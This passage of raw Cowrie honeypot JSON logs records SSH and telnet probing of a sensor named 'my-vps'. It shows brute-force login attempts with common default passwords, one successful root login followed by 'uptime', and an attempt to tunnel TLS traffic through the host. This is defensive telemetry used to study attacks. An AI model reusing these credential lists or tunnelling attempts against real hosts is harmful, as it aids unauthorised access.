03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x9f&\\x04\\xcb\\x12P\\xc2\\x92\\xe4\\x13\\xbd&\\x01`\\x87\\xa0\\xcf\\x96ij%s\\xd0\\xb1\\xb0\\x0f\\xcb.0\\x92A\\x06\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-28T22:00:01.065057Z","src_ip":"212.227.235.229","session":"5bc82d3b7c27"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.251.36.36","dst_port":443,"src_ip":"212.227.235.229","src_port":58420,"message":"direct-tcp connection request to 142.251.36.36:443 from 127.0.0.1:58420","sensor":"my-vps","timestamp":"2025-08-28T22:00:01.191630Z","session":"5bc82d3b7c27"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.251.36.36","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xe4\\x15b\\xd7\\x9bJ\\xd0\\x92\\x18\\x16\\xb3\\x01\\xd4/\\xbd\\xbd\\xd3Y\\xb3~\\xc7\\x16\\xed\\x9e=^\\xcd\\xbe_BBT \\x03\\x9b\\x15\\xb5\\xe7H\\x97\\xd9\\x17\\xdbX\\x9bY\\x18$\\x0b\\xf2\\x03\\xc9\\xc2W\\xec\\xdc;M\\xb4\\xab4\\x80~\\xe1\\xa8\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 |\\x89\\x0e\\\\\\xebQ\\x0b^\\xef\\xc5\\x9bj\\xe6\\x92\\xbd\\x01\\xf3\\x17\\x8dv\\xa3\\x05t\\x0bh5Y0\\xd1r(*\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":2,"message":"discarded direct-tcp forward request 2 to 142.251.36.36:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xe4\\x15b\\xd7\\x9bJ\\xd0\\x92\\x18\\x16\\xb3\\x01\\xd4/\\xbd\\xbd\\xd3Y\\xb3~\\xc7\\x16\\xed\\x9e=^\\xcd\\xbe_BBT \\x03\\x9b\\x15\\xb5\\xe7H\\x97\\xd9\\x17\\xdbX\\x9bY\\x18$\\x0b\\xf2\\x03\\xc9\\xc2W\\xec\\xdc;M\\xb4\\xab4\\x80~\\xe1\\xa8\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 |\\x89\\x0e\\\\\\xebQ\\x0b^\\xef\\xc5\\x9bj\\xe6\\x92\\xbd\\x01\\xf3\\x17\\x8dv\\xa3\\x05t\\x0bh5Y0\\xd1r(*\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-28T22:00:01.689920Z","src_ip":"212.227.235.229","session":"5bc82d3b7c27"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:00:01.846745Z","src_ip":"212.227.235.229","session":"5bc82d3b7c27"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":14849,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf1d2dfef9f5","protocol":"ssh","message":"New connection: 80.94.95.15:14849 (1.2.3.4:22) [session: bf1d2dfef9f5]","sensor":"my-vps","timestamp":"2025-08-28T22:00:09.042008Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T22:00:09.043084Z","src_ip":"80.94.95.15","session":"bf1d2dfef9f5"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T22:00:09.094483Z","src_ip":"80.94.95.15","session":"bf1d2dfef9f5"}
{"eventid":"cowrie.login.failed","username":"admin","password":"dagmarka1304","message":"login attempt [admin/dagmarka1304] failed","sensor":"my-vps","timestamp":"2025-08-28T22:00:09.384426Z","src_ip":"80.94.95.15","session":"bf1d2dfef9f5"}
{"eventid":"cowrie.login.failed","username":"admin","password":"openmediavault","message":"login attempt [admin/openmediavault] failed","sensor":"my-vps","timestamp":"2025-08-28T22:00:10.439442Z","src_ip":"80.94.95.15","session":"bf1d2dfef9f5"}
{"eventid":"cowrie.login.failed","username":"admin","password":"11111111","message":"login attempt [admin/11111111] failed","sensor":"my-vps","timestamp":"2025-08-28T22:00:11.493611Z","src_ip":"80.94.95.15","session":"bf1d2dfef9f5"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234567","message":"login attempt [admin/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T22:00:12.553010Z","src_ip":"80.94.95.15","session":"bf1d2dfef9f5"}
{"eventid":"cowrie.login.failed","username":"admin","password":"root","message":"login attempt [admin/root] failed","sensor":"my-vps","timestamp":"2025-08-28T22:00:13.616412Z","src_ip":"80.94.95.15","session":"bf1d2dfef9f5"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:00:14.669816Z","src_ip":"80.94.95.15","session":"bf1d2dfef9f5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42496,"dst_ip":"1.2.3.4","dst_port":22,"session":"1dd487e2daaf","protocol":"ssh","message":"New connection: 212.227.235.229:42496 (1.2.3.4:22) [session: 1dd487e2daaf]","sensor":"my-vps","timestamp":"2025-08-28T22:00:36.750754Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:00:36.857191Z","src_ip":"212.227.235.229","session":"1dd487e2daaf"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:00:50.183318Z","src_ip":"212.227.235.229","session":"5602a51d610e"}
{"eventid":"cowrie.session.connect","src_ip":"3.137.73.221","src_port":47676,"dst_ip":"1.2.3.4","dst_port":22,"session":"819f3d5265f1","protocol":"ssh","message":"New connection: 3.137.73.221:47676 (1.2.3.4:22) [session: 819f3d5265f1]","sensor":"my-vps","timestamp":"2025-08-28T22:00:52.569912Z"}
{"eventid":"cowrie.client.version","version":"","message":"Remote SSH version: ","sensor":"my-vps","timestamp":"2025-08-28T22:00:52.570856Z","src_ip":"3.137.73.221","session":"819f3d5265f1"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:00:52.571616Z","src_ip":"3.137.73.221","session":"819f3d5265f1"}
{"eventid":"cowrie.session.connect","src_ip":"3.137.73.221","src_port":47700,"dst_ip":"1.2.3.4","dst_port":22,"session":"9cf19bf0772c","protocol":"ssh","message":"New connection: 3.137.73.221:47700 (1.2.3.4:22) [session: 9cf19bf0772c]","sensor":"my-vps","timestamp":"2025-08-28T22:00:54.883640Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-28T22:00:54.911646Z","src_ip":"3.137.73.221","session":"9cf19bf0772c"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:00:54.912814Z","src_ip":"3.137.73.221","session":"9cf19bf0772c"}
{"eventid":"cowrie.session.connect","src_ip":"3.137.73.221","src_port":47716,"dst_ip":"1.2.3.4","dst_port":22,"session":"337d7f0b4237","protocol":"ssh","message":"New connection: 3.137.73.221:47716 (1.2.3.4:22) [session: 337d7f0b4237]","sensor":"my-vps","timestamp":"2025-08-28T22:00:57.063228Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-28T22:00:57.064340Z","src_ip":"3.137.73.221","session":"337d7f0b4237"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:00:57.065208Z","src_ip":"3.137.73.221","session":"337d7f0b4237"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":18809,"dst_ip":"1.2.3.4","dst_port":22,"session":"27a5174e8f17","protocol":"ssh","message":"New connection: 212.227.235.229:18809 (1.2.3.4:22) [session: 27a5174e8f17]","sensor":"my-vps","timestamp":"2025-08-28T22:01:22.575678Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T22:01:22.576473Z","src_ip":"212.227.235.229","session":"27a5174e8f17"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T22:01:22.706463Z","src_ip":"212.227.235.229","session":"27a5174e8f17"}
{"eventid":"cowrie.login.failed","username":"admin","password":"Password123","message":"login attempt [admin/Password123] failed","sensor":"my-vps","timestamp":"2025-08-28T22:01:23.305167Z","src_ip":"212.227.235.229","session":"27a5174e8f17"}
{"eventid":"cowrie.login.failed","username":"admin","password":"lab","message":"login attempt [admin/lab] failed","sensor":"my-vps","timestamp":"2025-08-28T22:01:24.437801Z","src_ip":"212.227.235.229","session":"27a5174e8f17"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password1","message":"login attempt [admin/password1] failed","sensor":"my-vps","timestamp":"2025-08-28T22:01:25.569420Z","src_ip":"212.227.235.229","session":"27a5174e8f17"}
{"eventid":"cowrie.login.failed","username":"admin","password":"0","message":"login attempt [admin/0] failed","sensor":"my-vps","timestamp":"2025-08-28T22:01:26.700900Z","src_ip":"212.227.235.229","session":"27a5174e8f17"}
{"eventid":"cowrie.login.failed","username":"admin","password":"8EjTlr35SVMd","message":"login attempt [admin/8EjTlr35SVMd] failed","sensor":"my-vps","timestamp":"2025-08-28T22:01:27.832783Z","src_ip":"212.227.235.229","session":"27a5174e8f17"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:01:28.964692Z","src_ip":"212.227.235.229","session":"27a5174e8f17"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47364,"dst_ip":"1.2.3.4","dst_port":23,"session":"b7175016ac93","protocol":"telnet","message":"New connection: 212.227.235.229:47364 (1.2.3.4:23) [session: b7175016ac93]","sensor":"my-vps","timestamp":"2025-08-28T22:01:40.411005Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60023,"dst_ip":"1.2.3.4","dst_port":22,"session":"4cd98b9e22e4","protocol":"ssh","message":"New connection: 212.227.125.160:60023 (1.2.3.4:22) [session: 4cd98b9e22e4]","sensor":"my-vps","timestamp":"2025-08-28T22:01:51.557570Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:01:51.649544Z","src_ip":"212.227.125.160","session":"4cd98b9e22e4"}
{"eventid":"cowrie.session.closed","duration":14.087791204452515,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:01:54.498709Z","src_ip":"212.227.235.229","session":"b7175016ac93"}
{"eventid":"cowrie.session.connect","src_ip":"74.235.100.212","src_port":47734,"dst_ip":"1.2.3.4","dst_port":23,"session":"2f1cd78f0932","protocol":"telnet","message":"New connection: 74.235.100.212:47734 (1.2.3.4:23) [session: 2f1cd78f0932]","sensor":"my-vps","timestamp":"2025-08-28T22:02:33.446167Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34222,"dst_ip":"1.2.3.4","dst_port":22,"session":"956611486800","protocol":"ssh","message":"New connection: 212.227.235.229:34222 (1.2.3.4:22) [session: 956611486800]","sensor":"my-vps","timestamp":"2025-08-28T22:02:34.075274Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:02:34.078079Z","src_ip":"212.227.235.229","session":"956611486800"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59250,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2e7a89f81e7","protocol":"ssh","message":"New connection: 212.227.125.160:59250 (1.2.3.4:22) [session: a2e7a89f81e7]","sensor":"my-vps","timestamp":"2025-08-28T22:02:35.545424Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:02:37.244895Z","src_ip":"212.227.125.160","session":"a2e7a89f81e7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T22:02:37.246017Z","src_ip":"212.227.125.160","session":"a2e7a89f81e7"}
{"eventid":"cowrie.session.closed","duration":10.098514318466187,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:02:43.544612Z","src_ip":"74.235.100.212","session":"2f1cd78f0932"}
{"eventid":"cowrie.session.connect","src_ip":"74.235.100.212","src_port":35832,"dst_ip":"1.2.3.4","dst_port":23,"session":"e4b19d584a35","protocol":"telnet","message":"New connection: 74.235.100.212:35832 (1.2.3.4:23) [session: e4b19d584a35]","sensor":"my-vps","timestamp":"2025-08-28T22:02:43.642205Z"}
{"eventid":"cowrie.session.closed","duration":0.10961055755615234,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:02:43.751718Z","src_ip":"74.235.100.212","session":"e4b19d584a35"}
{"eventid":"cowrie.login.success","username":"root","password":"[UNKNOWNorV70]","message":"login attempt [root/[UNKNOWNorV70]] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:02:43.968266Z","src_ip":"212.227.125.160","session":"a2e7a89f81e7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T22:02:47.553707Z","src_ip":"212.227.125.160","session":"a2e7a89f81e7"}
{"eventid":"cowrie.command.input","input":"uptime","message":"CMD: uptime","sensor":"my-vps","timestamp":"2025-08-28T22:02:47.554430Z","src_ip":"212.227.125.160","session":"a2e7a89f81e7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","size":69,"shasum":"dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802 after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:02:48.783787Z","src_ip":"212.227.125.160","session":"a2e7a89f81e7"}
{"eventid":"cowrie.session.closed","duration":"13.2","message":"Connection lost after 13.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:02:48.784888Z","src_ip":"212.227.125.160","session":"a2e7a89f81e7"}
{"eventid":"cowrie.session.connect","src_ip":"69.164.213.123","src_port":52544,"dst_ip":"1.2.3.4","dst_port":23,"session":"5eb5affec789","protocol":"telnet","message":"New connection: 69.164.213.123:52544 (1.2.3.4:23) [session: 5eb5affec789]","sensor":"my-vps","timestamp":"2025-08-28T22:02:49.088917Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T22:02:49.498884Z","src_ip":"69.164.213.123","session":"5eb5affec789"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T22:02:51.180010Z","src_ip":"69.164.213.123","session":"5eb5affec789"}
{"eventid":"cowrie.session.closed","duration":2.7639808654785156,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:02:51.852810Z","src_ip":"69.164.213.123","session":"5eb5affec789"}
{"eventid":"cowrie.session.connect","src_ip":"69.164.213.123","src_port":43202,"dst_ip":"1.2.3.4","dst_port":23,"session":"15c15823b185","protocol":"telnet","message":"New connection: 69.164.213.123:43202 (1.2.3.4:23) [session: 15c15823b185]","sensor":"my-vps","timestamp":"2025-08-28T22:02:51.948133Z"}
{"eventid":"cowrie.session.closed","duration":1.2792983055114746,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:02:53.227361Z","src_ip":"69.164.213.123","session":"15c15823b185"}
{"eventid":"cowrie.session.connect","src_ip":"69.164.213.123","src_port":43214,"dst_ip":"1.2.3.4","dst_port":23,"session":"5113537b9803","protocol":"telnet","message":"New connection: 69.164.213.123:43214 (1.2.3.4:23) [session: 5113537b9803]","sensor":"my-vps","timestamp":"2025-08-28T22:02:53.324721Z"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":52104,"dst_ip":"1.2.3.4","dst_port":22,"session":"05b3d182a5b7","protocol":"ssh","message":"New connection: 201.148.180.50:52104 (1.2.3.4:22) [session: 05b3d182a5b7]","sensor":"my-vps","timestamp":"2025-08-28T22:02:54.218374Z"}
{"eventid":"cowrie.session.closed","duration":1.2818057537078857,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:02:54.606439Z","src_ip":"69.164.213.123","session":"5113537b9803"}
